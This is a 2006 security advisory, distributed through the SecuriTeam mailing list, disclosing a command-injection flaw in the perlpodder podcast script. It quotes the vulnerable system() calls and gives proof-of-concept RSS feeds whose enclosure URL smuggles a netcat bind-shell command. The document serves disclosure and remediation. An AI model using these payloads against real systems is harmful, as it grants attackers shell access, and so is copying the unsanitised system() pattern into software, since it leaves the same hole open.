The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Perlpodder Arbitrary Command Execution
------------------------------------------------------------------------
SUMMARY
<http://sourceforge.net/projects/perlpodder/> Perlpodder is a podcatcher
script written in perl. It automates downloading podcasts. Podcasting is
the distribution of multimedia files over the internet. Normally, a server
is providing an RSS or Atom XML feed describing where to get the
multimedia files. The client parses the feed and may then download the
desired files.
A security flaw was identified in perlpodder which makes it possible for a
malicious podcast server to execute arbitrary shell commands on the
victim's client.
DETAILS
Vulnerable Systems:
* perlpodder-0.4 and prior.
Immune Systems:
* perlpodder-0.5
When perlpodder is used to fetch a podcast, perlpodder will extract the
URL of the audio-file from the XML-file the server provides. The URLs are
saved in the variable "$dlset". There are two occasions in the code where
this variable will be used together with the system() command:
The first usage is with "echo" to log the URL (line 278):
[...]
277 # add urls to log file to mark as retrieved
278 $addurl = "echo " . $dlset . " >> $log_path ";
279 system $addurl;
[...]
The second usage is with "wget" to actually fetch the audio file (line
294):
[...]
291 # Prepair to call wget
292
293 $wget_path = "$cwd". "$datadir" ;
294 $wget_cmd = "wget --quiet --background -o /dev/null -c --tries=2
--timeout=20 --random-wait " . $dlset . " -P ".
$wget_path ;
295
296 if ($DEBUG > 0) {
297
298 print "running " . $wget_cmd . "\n" ;
299
300 }
301
302 system $wget_cmd;
[...]
Unfortunately, $dlset is never properly sanitized, so it is possible for
the remote server to include arbitrary shell commands in the URL which
will then be executed using system() (lines 279 and 302).
Proof of Concept:
A minimal malicious server rss feed which exploits the "echo" call may
look as follows:
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
<title>RedTeam Pentesting Example Malicious Server Feed</title>
<item>
<enclosure url="http://www.example.com/example.mp3 >> /dev/null;
nc -e /bin/sh -l -p 1337 &#" length="241734" type="audio/mpeg" />
</item>
</channel>
</rss>
The URL above will open port 1337 via netcat on the victim's computer and
bind a shell to it. This is just one example of how to exploit the
vulnerability, as arbitrary commands can be included in the URL, but it
should illustrate the point.
To exploit the "wget" call, the URL just has to be minimally adjusted:
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
<title>RedTeam Pentesting</title>
<item>
<enclosure url="http://www.example.com/example.mp3; nc -e /bin/sh
-l -p 1337 &#" length="241734" type="audio/mpeg" />
</item>
</channel>
</rss>
Workaround:
Do not use perlpodder with untrusted servers.
Fix:
Upgrade to
<http://prdownloads.sourceforge.net/perlpodder/perlpodder-0.5.tar.gz?download>
perlpodder-0.5 immediately.
Disclosure Timeline:
* 2006-05-19 - Discovery of the problem
* 2006-05-19 - Notification of the author
* 2006-05-21 - Fixed version of perlpodder is released
* 2006-05-22 - Email from author pointing out the release
* 2006-05-22 - Public release of the advisory without CVE number because
of public release by the author. CVE will be appended when available.
ADDITIONAL INFORMATION
The original article can be found at:
<http://www.redteam-pentesting.de/advisories/rt-sa-2006-003.txt>
http://www.redteam-pentesting.de/advisories/rt-sa-2006-003.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
